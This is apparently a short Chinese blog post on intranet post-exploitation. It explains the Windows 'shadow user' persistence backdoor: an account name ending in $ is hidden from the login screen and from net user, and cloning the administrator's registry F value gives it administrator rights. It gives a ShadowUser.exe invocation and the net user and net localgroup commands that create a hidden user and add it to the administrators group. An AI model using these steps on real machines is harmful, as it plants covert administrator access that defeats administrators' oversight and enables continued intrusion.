0x00 前提
水一篇内网东西,主要针对一种情况:抓到 hash 解不开, 又不想 pth, 就想直接登桌面
0x01权限维持-影子用户后门
影子账户,古老但有效!
原理
代 $ 符号的用户名不会显示出来,仔通导出注册表,并修改F值,克隆账号,再删除账号
效果
net user无法删除,需要删除注册表相关键值;- Windows 的登录界面不显示该用户信息。
0x02 简单实用
ShadowUser.exe admin administrator
可以正常登录,桌面什么也是克隆的administrator的
单纯的创建隐藏用户
我们先利用命令创建一个隐藏用户,并将其加入本地管理员组。
net user test$ Test123456 /add
net localgroup administrators test$ /add